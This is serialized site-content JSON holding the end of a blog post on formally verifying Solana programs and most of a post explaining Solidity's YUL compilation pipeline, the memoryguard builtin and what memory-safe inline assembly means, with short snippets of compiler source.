layer.",{"type":24,"tag":32,"props":35697,"children":35698},{},[35699],{"type":30,"value":35700},"Disclaimer out of the way, we believe that formal verification can still be a very useful tool when applied correctly. We've demonstrated that it is possible to automatically prove invariants about Solana programs in a tractable and user-friendly way.",{"type":24,"tag":2719,"props":35702,"children":35703},{},[],{"type":24,"tag":32,"props":35705,"children":35706},{},[35707],{"type":24,"tag":5422,"props":35708,"children":35709},{},[35710,35712,35717,35718,35722],{"type":30,"value":35711},"We're excited to keep pushing this research forward and enhance the security of the whole Solana ecosystem. Our tools are still in development but we're interested in working with other teams. If you have a Solana program you want to get formally verified, give us a shout! Fill out ",{"type":24,"tag":188,"props":35713,"children":35715},{"href":25653,"rel":35714},[192],[35716],{"type":30,"value":25657},{"type":30,"value":25659},{"type":24,"tag":188,"props":35719,"children":35720},{"href":25662},[35721],{"type":30,"value":25665},{"type":30,"value":206},{"type":24,"tag":9672,"props":35724,"children":35725},{},[35726],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":35728},[35729,35735,35739,35744,35750,35754],{"id":25726,"depth":320,"text":25729,"children":35730},[35731,35732,35733,35734],{"id":25732,"depth":335,"text":25735},{"id":25800,"depth":335,"text":25803},{"id":26675,"depth":335,"text":26678},{"id":26715,"depth":335,"text":26718},{"id":26768,"depth":320,"text":35736,"children":35737},"Specification: How can we describe what we want our program to do?",[35738],{"id":26881,"depth":335,"text":26884},{"id":28239,"depth":320,"text":28242,"children":35740},[35741,35742,35743],{"id":28916,"depth":335,"text":28919},{"id":29199,"depth":335,"text":29202},{"id":29343,"depth":335,"text":29346},{"id":29484,"depth":320,"text":29487,"children":35745},[35746,35747,35748,35749],{"id":29555,"depth":335,"text":29558},{"id":31394,"depth":335,"text":31397},{"id":32196,"depth":335,"text":29547},{"id":34721,"depth":335,"text":29552},{"id":35561,"depth":320,"text":35564,"children":35751},[35752,35753],{"id":35567,"depth":335,"text":35570},{"id":35668,"depth":335,"text":35671},{"id":9652,"depth":320,"text":9655},"content:blog:2023-01-26-formally-verifying-solana-programs.md","blog/2023-01-26-formally-verifying-solana-programs.md","blog/2023-01-26-formally-verifying-solana-programs",{"_path":35759,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":35760,"description":35761,"author":12540,"image":35762,"date":35764,"isFeatured":16,"onBlogPage":16,"tags":35765,"body":35767,"_type":9700,"_id":37186,"_source":9702,"_file":37187,"_stem":37188,"_extension":9705},"/blog/2023-07-28-solidity-compilers-memory-safety","Solidity Compilers: Memory Safety","An exploration into the Solidity compilation pipeline, optimization assumptions, and how it all relates back to memory-safe assembly.",{"src":35763,"height":15,"width":15},"/posts/solidity-compilers-memory-safety/header.jpg","2023-07-28",[11299,35766],"compiler",{"type":21,"children":35768,"toc":37177},[35769,35775,35811,35823,35829,35851,35864,36012,36033,36038,36059,36064,36072,36077,36082,36087,36093,36112,36117,36138,36201,36214,36244,36264,36291,36296,36309,36314,36319,36332,36363,36386,36540,36558,36608,36627,36652,36657,36663,36690,36710,36738,36743,36765,36784,36792,36803,36808,36824,37081,37089,37094,37098,37103,37108,37173],{"type":24,"tag":43,"props":35770,"children":35772},{"id":35771},"introduction",[35773],{"type":30,"value":35774},"Introduction",{"type":24,"tag":32,"props":35776,"children":35777},{},[35778,35780,35786,35787,35791,35793,35800,35802,35809],{"type":30,"value":35779},"What does ",{"type":24,"tag":145,"props":35781,"children":35783},{"className":35782},[],[35784],{"type":30,"value":35785},"memory-safe",{"type":30,"value":13277},{"type":24,"tag":5422,"props":35788,"children":35789},{},[35790],{"type":30,"value":16095},{"type":30,"value":35792}," mean? What guarantees does Solidity expose when you're dealing with inline assembly? The documentation ",{"type":24,"tag":188,"props":35794,"children":35797},{"href":35795,"rel":35796},"https://docs.soliditylang.org/en/v0.8.20/assembly.html#memory-safety",[192],[35798],{"type":30,"value":35799},"presents some requirements",{"type":30,"value":35801},", but is production code that ",{"type":24,"tag":188,"props":35803,"children":35806},{"href":35804,"rel":35805},"https://github.com/Vectorized/solady/blob/main/src/utils/SafeTransferLib.sol#L165-L166",[192],[35807],{"type":30,"value":35808},"violates these requirements",{"type":30,"value":35810}," necessarily unsafe?",{"type":24,"tag":32,"props":35812,"children":35813},{},[35814,35816,35821],{"type":30,"value":35815},"In this blog post, we present a high-level overview of the Solidity compiler. We'll also dive into the optimization pipeline, language lawyering, and present an argument for what ",{"type":24,"tag":5422,"props":35817,"children":35818},{},[35819],{"type":30,"value":35820},"memory-safety",{"type":30,"value":35822}," actually means.",{"type":24,"tag":43,"props":35824,"children":35826},{"id":35825},"compiler-pipeline",[35827],{"type":30,"value":35828},"Compiler Pipeline",{"type":24,"tag":32,"props":35830,"children":35831},{},[35832,35834,35841,35843,35850],{"type":30,"value":35833},"For brevity's sake, we'll only cover the YUL IR Solidity compilation pipeline ",{"type":24,"tag":188,"props":35835,"children":35838},{"href":35836,"rel":35837},"https://blog.soliditylang.org/2022/03/16/solidity-0.8.13-release-announcement/",[192],[35839],{"type":30,"value":35840},"released in v0.8.13",{"type":30,"value":35842},". Compilation happens ",{"type":24,"tag":188,"props":35844,"children":35847},{"href":35845,"rel":35846},"https://github.com/ethereum/solidity/blob/4a8d6618f5b398077f694835905f93d0a3890289/libsolidity/interface/CompilerStack.cpp#L684",[192],[35848],{"type":30,"value":35849},"in two main steps",{"type":30,"value":1679},{"type":24,"tag":6246,"props":35852,"children":35853},{},[35854,35859],{"type":24,"tag":2659,"props":35855,"children":35856},{},[35857],{"type":30,"value":35858},"Solidity to YUL IR",{"type":24,"tag":2659,"props":35860,"children":35861},{},[35862],{"type":30,"value":35863},"YUL IR to EVM opcodes",{"type":24,"tag":291,"props":35865,"children":35869},{"className":35866,"code":35867,"language":35868,"meta":7,"style":7},"language-cpp shiki shiki-themes slack-dark"," if (m_viaIR || m_generateIR || m_generateEwasm)\n generateIR(*contract);\n if (m_generateEvmBytecode)\n {\n if (m_viaIR)\n generateEVMFromIR(*contract);\n else\n compileContract(*contract, otherCompilers);\n }\n","cpp",[35870],{"type":24,"tag":145,"props":35871,"children":35872},{"__ignoreMap":7},[35873,35903,35924,35936,35944,35956,35976,35984,36005],{"type":24,"tag":301,"props":35874,"children":35875},{"class":303,"line":304},[35876,35880,35885,35889,35894,35898],{"type":24,"tag":301,"props":35877,"children":35878},{"style":308},[35879],{"type":30,"value":453},{"type":24,"tag":301,"props":35881,"children":35882},{"style":359},[35883],{"type":30,"value":35884}," (m_viaIR ",{"type":24,"tag":301,"props":35886,"children":35887},{"style":385},[35888],{"type":30,"value":5632},{"type":24,"tag":301,"props":35890,"children":35891},{"style":359},[35892],{"type":30,"value":35893}," m_generateIR ",{"type":24,"tag":301,"props":35895,"children":35896},{"style":385},[35897],{"type":30,"value":5632},{"type":24,"tag":301,"props":35899,"children":35900},{"style":359},[35901],{"type":30,"value":35902}," m_generateEwasm)\n",{"type":24,"tag":301,"props":35904,"children":35905},{"class":303,"line":320},[35906,35911,35915,35919],{"type":24,"tag":301,"props":35907,"children":35908},{"style":314},[35909],{"type":30,"value":35910}," generateIR",{"type":24,"tag":301,"props":35912,"children":35913},{"style":359},[35914],{"type":30,"value":362},{"type":24,"tag":301,"props":35916,"children":35917},{"style":385},[35918],{"type":30,"value":772},{"type":24,"tag":301,"props":35920,"children":35921},{"style":359},[35922],{"type":30,"value":35923},"contract);\n",{"type":24,"tag":301,"props":35925,"children":35926},{"class":303,"line":335},[35927,35931],{"type":24,"tag":301,"props":35928,"children":35929},{"style":308},[35930],{"type":30,"value":453},{"type":24,"tag":301,"props":35932,"children":35933},{"style":359},[35934],{"type":30,"value":35935}," (m_generateEvmBytecode)\n",{"type":24,"tag":301,"props":35937,"children":35938},{"class":303,"line":344},[35939],{"type":24,"tag":301,"props":35940,"children":35941},{"style":359},[35942],{"type":30,"value":35943}," {\n",{"type":24,"tag":301,"props":35945,"children":35946},{"class":303,"line":401},[35947,35951],{"type":24,"tag":301,"props":35948,"children":35949},{"style":308},[35950],{"type":30,"value":3285},{"type":24,"tag":301,"props":35952,"children":35953},{"style":359},[35954],{"type":30,"value":35955}," (m_viaIR)\n",{"type":24,"tag":301,"props":35957,"children":35958},{"class":303,"line":415},[35959,35964,35968,35972],{"type":24,"tag":301,"props":35960,"children":35961},{"style":314},[35962],{"type":30,"value":35963}," generateEVMFromIR",{"type":24,"tag":301,"props":35965,"children":35966},{"style":359},[35967],{"type":30,"value":362},{"type":24,"tag":301,"props":35969,"children":35970},{"style":385},[35971],{"type":30,"value":772},{"type":24,"tag":301,"props":35973,"children":35974},{"style":359},[35975],{"type":30,"value":35923},{"type":24,"tag":301,"props":35977,"children":35978},{"class":303,"line":439},[35979],{"type":24,"tag":301,"props":35980,"children":35981},{"style":308},[35982],{"type":30,"value":35983}," else\n",{"type":24,"tag":301,"props":35985,"children":35986},{"class":303,"line":447},[35987,35992,35996,36000],{"type":24,"tag":301,"props":35988,"children":35989},{"style":314},[35990],{"type":30,"value":35991}," compileContract",{"type":24,"tag":301,"props":35993,"children":35994},{"style":359},[35995],{"type":30,"value":362},{"type":24,"tag":301,"props":35997,"children":35998},{"style":385},[35999],{"type":30,"value":772},{"type":24,"tag":301,"props":36001,"children":36002},{"style":359},[36003],{"type":30,"value":36004},"contract, otherCompilers);\n",{"type":24,"tag":301,"props":36006,"children":36007},{"class":303,"line":476},[36008],{"type":24,"tag":301,"props":36009,"children":36010},{"style":359},[36011],{"type":30,"value":501},{"type":24,"tag":32,"props":36013,"children":36014},{},[36015,36017,36024,36025,36032],{"type":30,"value":36016},"Each step applies its own set of optimizations. The entrypoints are located at ",{"type":24,"tag":188,"props":36018,"children":36021},{"href":36019,"rel":36020},"https://github.com/ethereum/solidity/blob/fd9ac9abed2049a4b8134d39e178275c8aad75b6/libyul/YulStack.cpp#L92",[192],[36022],{"type":30,"value":36023},"YulStack::optimize",{"type":30,"value":2378},{"type":24,"tag":188,"props":36026,"children":36029},{"href":36027,"rel":36028},"https://github.com/ethereum/solidity/blob/4a8d6618f5b398077f694835905f93d0a3890289/libevmasm/Assembly.cpp#L336",[192],[36030],{"type":30,"value":36031},"Assembly::optimize",{"type":30,"value":206},{"type":24,"tag":32,"props":36034,"children":36035},{},[36036],{"type":30,"value":36037},"In total, there are four steps.",{"type":24,"tag":6246,"props":36039,"children":36040},{},[36041,36045,36050,36054],{"type":24,"tag":2659,"props":36042,"children":36043},{},[36044],{"type":30,"value":35858},{"type":24,"tag":2659,"props":36046,"children":36047},{},[36048],{"type":30,"value":36049},"Optimization of YUL IR",{"type":24,"tag":2659,"props":36051,"children":36052},{},[36053],{"type":30,"value":35863},{"type":24,"tag":2659,"props":36055,"children":36056},{},[36057],{"type":30,"value":36058},"Optimization of EVM opcodes",{"type":24,"tag":32,"props":36060,"children":36061},{},[36062],{"type":30,"value":36063},"As mentioned in the v0.8.13 release post, the YUL optimizer is able to perform much more complex optimizations. Compared to Solidity, YUL contains detailed semantic information and is simpler for optimization passes to reason about than opcodes.",{"type":24,"tag":9770,"props":36065,"children":36066},{},[36067],{"type":24,"tag":32,"props":36068,"children":36069},{},[36070],{"type":30,"value":36071},"The performance of the new pipeline is not yet always superior to the old one, but it can do much higher-level optimization across functions, so please try it out and give us feedback!",{"type":24,"tag":32,"props":36073,"children":36074},{},[36075],{"type":30,"value":36076},"Importantly, each step happens in isolation and retains no information about the previous stage.",{"type":24,"tag":32,"props":36078,"children":36079},{},[36080],{"type":30,"value":36081},"The optimizer cannot change the behavior of the generated IR. This means we don't need to worry about potentially tricky optimizations such as reordering of functions, removal of unused assigns, or moving stack variables to memory.",{"type":24,"tag":32,"props":36083,"children":36084},{},[36085],{"type":30,"value":36086},"When it comes to safety, we need only to consider the IR generation. But what exactly are the guarantees here?",{"type":24,"tag":43,"props":36088,"children":36090},{"id":36089},"guarantees",[36091],{"type":30,"value":36092},"Guarantees",{"type":24,"tag":32,"props":36094,"children":36095},{},[36096,36097,36104,36106,36111],{"type":30,"value":8079},{"type":24,"tag":188,"props":36098,"children":36101},{"href":36099,"rel":36100},"https://docs.soliditylang.org/en/v0.8.20/internals/layout_in_memory.html",[192],[36102],{"type":30,"value":36103},"Solidity memory layout",{"type":30,"value":36105}," exists only at the time of YUL IR generation. The YUL optimizer and later steps has ",{"type":24,"tag":5422,"props":36107,"children":36108},{},[36109],{"type":30,"value":36110},"no information about this layout",{"type":30,"value":206},{"type":24,"tag":32,"props":36113,"children":36114},{},[36115],{"type":30,"value":36116},"What if the optimizer wants to use memory for optimization passes? How does it know what slots are used by the IR generator?",{"type":24,"tag":32,"props":36118,"children":36119},{},[36120,36122,36128,36130,36136],{"type":30,"value":36121},"Introducing ",{"type":24,"tag":145,"props":36123,"children":36125},{"className":36124},[],[36126],{"type":30,"value":36127},"memoryguard",{"type":30,"value":36129},". If you've ever looked at the output of ",{"type":24,"tag":145,"props":36131,"children":36133},{"className":36132},[],[36134],{"type":30,"value":36135},"solc --ir",{"type":30,"value":36137},", this call may be familiar. It's used to initialize the free-memory pointer.",{"type":24,"tag":291,"props":36139,"children":36141},{"className":11300,"code":36140,"language":11299,"meta":7,"style":7}," /// @src 0:26:371 \"contract XXX {...\"\n store(64, memoryguard(0x80))\n",[36142],{"type":24,"tag":145,"props":36143,"children":36144},{"__ignoreMap":7},[36145,36163],{"type":24,"tag":301,"props":36146,"children":36147},{"class":303,"line":304},[36148,36153,36158],{"type":24,"tag":301,"props":36149,"children":36150},{"style":1062},[36151],{"type":30,"value":36152}," /// @src 0:26:371 \"contract ",{"type":24,"tag":301,"props":36154,"children":36155},{"style":348},[36156],{"type":30,"value":36157},"XXX",{"type":24,"tag":301,"props":36159,"children":36160},{"style":1062},[36161],{"type":30,"value":36162}," {...\"\n",{"type":24,"tag":301,"props":36164,"children":36165},{"class":303,"line":320},[36166,36171,36175,36180,36184,36188,36192,36197],{"type":24,"tag":301,"props":36167,"children":36168},{"style":314},[36169],{"type":30,"value":36170}," store",{"type":24,"tag":301,"props":36172,"children":36173},{"style":359},[36174],{"type":30,"value":362},{"type":24,"tag":301,"props":36176,"children":36177},{"style":466},[36178],{"type":30,"value":36179},"64",{"type":24,"tag":301,"props":36181,"children":36182},{"style":359},[36183],{"type":30,"value":377},{"type":24,"tag":301,"props":36185,"children":36186},{"style":314},[36187],{"type":30,"value":36127},{"type":24,"tag":301,"props":36189,"children":36190},{"style":359},[36191],{"type":30,"value":362},{"type":24,"tag":301,"props":36193,"children":36194},{"style":466},[36195],{"type":30,"value":36196},"0x80",{"type":24,"tag":301,"props":36198,"children":36199},{"style":359},[36200],{"type":30,"value":9381},{"type":24,"tag":32,"props":36202,"children":36203},{},[36204,36206,36213],{"type":30,"value":36205},"From ",{"type":24,"tag":188,"props":36207,"children":36210},{"href":36208,"rel":36209},"https://solidity.readthedocs.io/en/latest/yul.html#memoryguard",[192],[36211],{"type":30,"value":36212},"the documentation",{"type":30,"value":10949},{"type":24,"tag":9770,"props":36215,"children":36216},{},[36217],{"type":24,"tag":32,"props":36218,"children":36219},{},[36220,36222,36228,36230,36236,36238,36243],{"type":30,"value":36221},"The caller of ",{"type":24,"tag":145,"props":36223,"children":36225},{"className":36224},[],[36226],{"type":30,"value":36227},"let ptr := memoryguard(size)",{"type":30,"value":36229}," (where size has to be a literal number) promises that they only use memory in either the range ",{"type":24,"tag":145,"props":36231,"children":36233},{"className":36232},[],[36234],{"type":30,"value":36235},"[0, size)",{"type":30,"value":36237}," or the unbounded range starting at ",{"type":24,"tag":145,"props":36239,"children":36241},{"className":36240},[],[36242],{"type":30,"value":3137},{"type":30,"value":206},{"type":24,"tag":32,"props":36245,"children":36246},{},[36247,36249,36254,36256,36262],{"type":30,"value":36248},"For example, if the YUL optimizer needs 32 bytes of memory, it can have ",{"type":24,"tag":145,"props":36250,"children":36252},{"className":36251},[],[36253],{"type":30,"value":36127},{"type":30,"value":36255}," return ",{"type":24,"tag":145,"props":36257,"children":36259},{"className":36258},[],[36260],{"type":30,"value":36261},"size + 32",{"type":30,"value":36263},". The optimizer gets a guaranteed region of memory which will not be touched!",{"type":24,"tag":32,"props":36265,"children":36266},{},[36267,36269,36276,36278,36283,36285,36290],{"type":30,"value":36268},"An example of this optimization in practice ",{"type":24,"tag":188,"props":36270,"children":36273},{"href":36271,"rel":36272},"https://github.com/ethereum/solidity/blob/1633e367c90aed7a6a14d84e2c288e6a8ab93304/libyul/optimiser/StackLimitEvader.cpp",[192],[36274],{"type":30,"value":36275},"is the StackLimitEvader",{"type":30,"value":36277},", which moves variables from the stack into memory. Incidentally, this is also currently the ",{"type":24,"tag":5422,"props":36279,"children":36280},{},[36281],{"type":30,"value":36282},"only",{"type":30,"value":36284}," optimization pass that relies on the semantic information communicated by ",{"type":24,"tag":145,"props":36286,"children":36288},{"className":36287},[],[36289],{"type":30,"value":36127},{"type":30,"value":206},{"type":24,"tag":32,"props":36292,"children":36293},{},[36294],{"type":30,"value":36295},"The modular design between different compiler stages also means that we're not tied down into any particular memory layout. Does it make sense to waste an entire memory word on the free memory pointer? Maybe not for some applications.",{"type":24,"tag":32,"props":36297,"children":36298},{},[36299,36301,36307],{"type":30,"value":36300},"Fear not, for we can remove this pointer entirely and call ",{"type":24,"tag":145,"props":36302,"children":36304},{"className":36303},[],[36305],{"type":30,"value":36306},"memoryguard(0x60)",{"type":30,"value":36308}," instead. The rest of the pipeline will still work.",{"type":24,"tag":43,"props":36310,"children":36311},{"id":35820},[36312],{"type":30,"value":36313},"Memory Safety",{"type":24,"tag":32,"props":36315,"children":36316},{},[36317],{"type":30,"value":36318},"So what does memory safety mean?",{"type":24,"tag":32,"props":36320,"children":36321},{},[36322,36324,36330],{"type":30,"value":36323},"The Solidity documentation provides ",{"type":24,"tag":188,"props":36325,"children":36327},{"href":35795,"rel":36326},[192],[36328],{"type":30,"value":36329},"a set of constraints",{"type":30,"value":36331},", not a definition.",{"type":24,"tag":9770,"props":36333,"children":36334},{},[36335,36340],{"type":24,"tag":32,"props":36336,"children":36337},{},[36338],{"type":30,"value":36339},"In particular, a memory-safe assembly block may only access the following memory ranges:",{"type":24,"tag":6246,"props":36341,"children":36342},{},[36343,36348,36353,36358],{"type":24,"tag":2659,"props":36344,"children":36345},{},[36346],{"type":30,"value":36347},"Memory allocated by yourself using a mechanism like the allocate function described above.",{"type":24,"tag":2659,"props":36349,"children":36350},{},[36351],{"type":30,"value":36352},"Memory allocated by Solidity, e.g. memory within the bounds of a memory array you reference.",{"type":24,"tag":2659,"props":36354,"children":36355},{},[36356],{"type":30,"value":36357},"The scratch space between memory offset 0 and 64 mentioned above.",{"type":24,"tag":2659,"props":36359,"children":36360},{},[36361],{"type":30,"value":36362},"Temporary memory that is located after the value of the free memory pointer at the beginning of the assembly\nblock, i.e. memory that is “allocated” at the free memory pointer without updating the free memory pointer.",{"type":24,"tag":32,"props":36364,"children":36365},{},[36366,36368,36375,36385],{"type":30,"value":36367},"Looking to the compiler, it appears the presence of memory-unsafe assembly ",{"type":24,"tag":188,"props":36369,"children":36372},{"href":36370,"rel":36371},"https://github.com/ethereum/solidity/blob/a297a687261a1c634551b1dac0e36d4573c19afe/libsolidity/codegen/ir/IRGenerator.cpp#L210",[192],[36373],{"type":30,"value":36374},"removes the memory guard",{"type":24,"tag":22262,"props":36376,"children":36377},{},[36378],{"type":24,"tag":188,"props":36379,"children":36383},{"href":36380,"ariaDescribedBy":36381,"dataFootnoteRef":7,"id":36382},"#user-content-fn-1",[22269],"user-content-fnref-1",[36384],{"type":30,"value":546},{"type":30,"value":206},{"type":24,"tag":291,"props":36387,"children":36389},{"className":35866,"code":36388,"language":35868,"meta":7,"style":7},"// bool creationInvolvesMemoryUnsafeAssembly = m_context.memoryUnsafeInlineAssemblySeen();\n// t(\"memoryInitCreation\", memoryInit(!creationInvolvesMemoryUnsafeAssembly));\n\nstring IRGenerator::memoryInit(bool _useMemoryGuard)\n{\n // This function should be called at the beginning of the EVM call frame\n // and thus can assume all memory to be zero, including the contents of\n // the \"zero memory area\" (the position CompilerUtils::zeroPointer points to).\n return\n Whiskers{\n _useMemoryGuard ?\n \"mstore(\u003CmemPtr>, memoryguard(\u003CfreeMemoryStart>))\" :\n \"mstore(\u003CmemPtr>, \u003CfreeMemoryStart>)\"\n }\n",[36390],{"type":24,"tag":145,"props":36391,"children":36392},{"__ignoreMap":7},[36393,36401,36409,36416,36452,36459,36467,36475,36483,36491,36499,36512,36525,36533],{"type":24,"tag":301,"props":36394,"children":36395},{"class":303,"line":304},[36396],{"type":24,"tag":301,"props":36397,"children":36398},{"style":1062},[36399],{"type":30,"value":36400},"// bool creationInvolvesMemoryUnsafeAssembly = m_context.memoryUnsafeInlineAssemblySeen();\n",{"type":24,"tag":301,"props":36402,"children":36403},{"class":303,"line":320},[36404],{"type":24,"tag":301,"props":36405,"children":36406},{"style":1062},[36407],{"type":30,"value":36408},"// t(\"memoryInitCreation\", memoryInit(!creationInvolvesMemoryUnsafeAssembly));\n",{"type":24,"tag":301,"props":36410,"children":36411},{"class":303,"line":335},[36412],{"type":24,"tag":301,"props":36413,"children":36414},{"emptyLinePlaceholder":16},[36415],{"type":30,"value":341},{"type":24,"tag":301,"props":36417,"children":36418},{"class":303,"line":344},[36419,36424,36429,36434,36438,36443,36448],{"type":24,"tag":301,"props":36420,"children":36421},{"style":10246},[36422],{"type":30,"value":36423},"string",{"type":24,"tag":301,"props":36425,"children":36426},{"style":359},[36427],{"type":30,"value":36428}," IRGenerator::",{"type":24,"tag":301,"props":36430,"children":36431},{"style":314},[36432],{"type":30,"value":36433},"memoryInit",{"type":24,"tag":301,"props":36435,"children":36436},{"style":359},[36437],{"type":30,"value":362},{"type":24,"tag":301,"props":36439,"children":36440},{"style":348},[36441],{"type":30,"value":36442},"bool",{"type":24,"tag":301,"props":36444,"children":36445},{"style":369},[36446],{"type":30,"value":36447}," _useMemoryGuard",{"type":24,"tag":301,"props":36449,"children":36450},{"style":359},[36451],{"type":30,"value":791},{"type":24,"tag":301,"props":36453,"children":36454},{"class":303,"line":401},[36455],{"type":24,"tag":301,"props":36456,"children":36457},{"style":359},[36458],{"type":30,"value":799},{"type":24,"tag":301,"props":36460,"children":36461},{"class":303,"line":415},[36462],{"type":24,"tag":301,"props":36463,"children":36464},{"style":1062},[36465],{"type":30,"value":36466}," // This function should be called at the beginning of the EVM call frame\n",{"type":24,"tag":301,"props":36468,"children":36469},{"class":303,"line":439},[36470],{"type":24,"tag":301,"props":36471,"children":36472},{"style":1062},[36473],{"type":30,"value":36474}," // and thus can assume all memory to be zero, including the contents of\n",{"type":24,"tag":301,"props":36476,"children":36477},{"class":303,"line":447},[36478],{"type":24,"tag":301,"props":36479,"children":36480},{"style":1062},[36481],{"type":30,"value":36482}," // the \"zero memory area\" (the position CompilerUtils::zeroPointer points to).\n",{"type":24,"tag":301,"props":36484,"children":36485},{"class":303,"line":476},[36486],{"type":24,"tag":301,"props":36487,"children":36488},{"style":308},[36489],{"type":30,"value":36490}," return\n",{"type":24,"tag":301,"props":36492,"children":36493},{"class":303,"line":495},[36494],{"type":24,"tag":301,"props":36495,"children":36496},{"style":359},[36497],{"type":30,"value":36498}," Whiskers{\n",{"type":24,"tag":301,"props":36500,"children":36501},{"class":303,"line":504},[36502,36507],{"type":24,"tag":301,"props":36503,"children":36504},{"style":359},[36505],{"type":30,"value":36506}," _useMemoryGuard ",{"type":24,"tag":301,"props":36508,"children":36509},{"style":385},[36510],{"type":30,"value":36511},"?\n",{"type":24,"tag":301,"props":36513,"children":36514},{"class":303,"line":512},[36515,36520],{"type":24,"tag":301,"props":36516,"children":36517},{"style":329},[36518],{"type":30,"value":36519}," \"mstore(\u003CmemPtr>, memoryguard(\u003CfreeMemoryStart>))\"",{"type":24,"tag":301,"props":36521,"children":36522},{"style":385},[36523],{"type":30,"value":36524}," :\n",{"type":24,"tag":301,"props":36526,"children":36527},{"class":303,"line":592},[36528],{"type":24,"tag":301,"props":36529,"children":36530},{"style":329},[36531],{"type":30,"value":36532}," \"mstore(\u003CmemPtr>, \u003CfreeMemoryStart>)\"\n",{"type":24,"tag":301,"props":36534,"children":36535},{"class":303,"line":619},[36536],{"type":24,"tag":301,"props":36537,"children":36538},{"style":359},[36539],{"type":30,"value":6918},{"type":24,"tag":32,"props":36541,"children":36542},{},[36543,36548,36550,36556],{"type":24,"tag":145,"props":36544,"children":36546},{"className":36545},[],[36547],{"type":30,"value":36135},{"type":30,"value":36549}," will now no longer have ",{"type":24,"tag":145,"props":36551,"children":36553},{"className":36552},[],[36554],{"type":30,"value":36555},"memoryguard(0x80)",{"type":30,"value":36557}," as expected.",{"type":24,"tag":291,"props":36559,"children":36561},{"className":11300,"code":36560,"language":11299,"meta":7,"style":7}," /// @src 0:26:371 \"contract XXX {...\"\n mstore(64, 128)\n",[36562],{"type":24,"tag":145,"props":36563,"children":36564},{"__ignoreMap":7},[36565,36580],{"type":24,"tag":301,"props":36566,"children":36567},{"class":303,"line":304},[36568,36572,36576],{"type":24,"tag":301,"props":36569,"children":36570},{"style":1062},[36571],{"type":30,"value":36152},{"type":24,"tag":301,"props":36573,"children":36574},{"style":348},[36575],{"type":30,"value":36157},{"type":24,"tag":301,"props":36577,"children":36578},{"style":1062},[36579],{"type":30,"value":36162},{"type":24,"tag":301,"props":36581,"children":36582},{"class":303,"line":320},[36583,36588,36592,36596,36600,36604],{"type":24,"tag":301,"props":36584,"children":36585},{"style":314},[36586],{"type":30,"value":36587}," mstore",{"type":24,"tag":301,"props":36589,"children":36590},{"style":359},[36591],{"type":30,"value":362},{"type":24,"tag":301,"props":36593,"children":36594},{"style":466},[36595],{"type":30,"value":36179},{"type":24,"tag":301,"props":36597,"children":36598},{"style":359},[36599],{"type":30,"value":377},{"type":24,"tag":301,"props":36601,"children":36602},{"style":466},[36603],{"type":30,"value":2060},{"type":24,"tag":301,"props":36605,"children":36606},{"style":359},[36607],{"type":30,"value":791},{"type":24,"tag":32,"props":36609,"children":36610},{},[36611,36613,36618,36620,36625],{"type":30,"value":36612},"Semantically, the absence of ",{"type":24,"tag":145,"props":36614,"children":36616},{"className":36615},[],[36617],{"type":30,"value":36127},{"type":30,"value":36619}," means that the IR generator is telling the optimizer that it cannot guarantee the ",{"type":24,"tag":145,"props":36621,"children":36623},{"className":36622},[],[36624],{"type":30,"value":36127},{"type":30,"value":36626}," invariant.",{"type":24,"tag":9770,"props":36628,"children":36629},{},[36630],{"type":24,"tag":32,"props":36631,"children":36632},{},[36633,36634,36639,36640,36645,36646,36651],{"type":30,"value":36221},{"type":24,"tag":145,"props":36635,"children":36637},{"className":36636},[],[36638],{"type":30,"value":36227},{"type":30,"value":36229},{"type":24,"tag":145,"props":36641,"children":36643},{"className":36642},[],[36644],{"type":30,"value":36235},{"type":30,"value":36237},{"type":24,"tag":145,"props":36647,"children":36649},{"className":36648},[],[36650],{"type":30,"value":3137},{"type":30,"value":206},{"type":24,"tag":32,"props":36653,"children":36654},{},[36655],{"type":30,"value":36656},"This makes sense. Without stricter guarantees by the programmer, memory-unsafe assembly can touch memory anywhere it wants. Because the optimizer no longer has this guarantee, it cannot use memory in any of its optimization passes.",{"type":24,"tag":43,"props":36658,"children":36660},{"id":36659},"undefined-behavior",[36661],{"type":30,"value":36662},"Undefined Behavior",{"type":24,"tag":32,"props":36664,"children":36665},{},[36666,36668,36673,36675,36680,36682,36688],{"type":30,"value":36667},"How strict is memory safety? When it comes to ",{"type":24,"tag":145,"props":36669,"children":36671},{"className":36670},[],[36672],{"type":30,"value":36127},{"type":30,"value":36674},", only touching memory after 0x80 seems to matter. Is ",{"type":24,"tag":145,"props":36676,"children":36678},{"className":36677},[],[36679],{"type":30,"value":35785},{"type":30,"value":36681}," annotated assembly that touches memory at ",{"type":24,"tag":145,"props":36683,"children":36685},{"className":36684},[],[36686],{"type":30,"value":36687},"[0x40, 0x7f]",{"type":30,"value":36689}," really safe?",{"type":24,"tag":32,"props":36691,"children":36692},{},[36693,36694,36701,36703,36708],{"type":30,"value":8079},{"type":24,"tag":188,"props":36695,"children":36698},{"href":36696,"rel":36697},"https://buildmedia.readthedocs.org/media/pdf/solidity/develop/solidity.pdf",[192],[36699],{"type":30,"value":36700},"Solidity documentation",{"type":30,"value":36702}," mentions ",{"type":24,"tag":5422,"props":36704,"children":36705},{},[36706],{"type":30,"value":36707},"undefined behavior",{"type":30,"value":36709}," three times.",{"type":24,"tag":6246,"props":36711,"children":36712},{},[36713,36718,36733],{"type":24,"tag":2659,"props":36714,"children":36715},{},[36716],{"type":30,"value":36717},"The existence of a dangling reference",{"type":24,"tag":2659,"props":36719,"children":36720},{},[36721,36723],{"type":30,"value":36722},"Using verbatim improperly",{"type":24,"tag":22262,"props":36724,"children":36725},{},[36726],{"type":24,"tag":188,"props":36727,"children":36731},{"href":36728,"ariaDescribedBy":36729,"dataFootnoteRef":7,"id":36730},"#user-content-fn-2",[22269],"user-content-fnref-2",[36732],{"type":30,"value":1503},{"type":24,"tag":2659,"props":36734,"children":36735},{},[36736],{"type":30,"value":36737},"Violating the memory model with in-line assembly marked as \"memory-safe\".",{"type":24,"tag":32,"props":36739,"children":36740},{},[36741],{"type":30,"value":36742},"Why does this matter?",{"type":24,"tag":32,"props":36744,"children":36745},{},[36746,36748,36755,36757,36764],{"type":30,"value":36747},"Assumptions about the program code can enable powerful optimizations - that's why ",{"type":24,"tag":188,"props":36749,"children":36752},{"href":36750,"rel":36751},"https://kristerw.blogspot.com/2016/02/how-undefined-signed-overflow-enables.html",[192],[36753],{"type":30,"value":36754},"signed integer overflow is undefined",{"type":30,"value":36756},". Strictly following the compiler model is critical. Undefined behavior materializes as tricky bugs 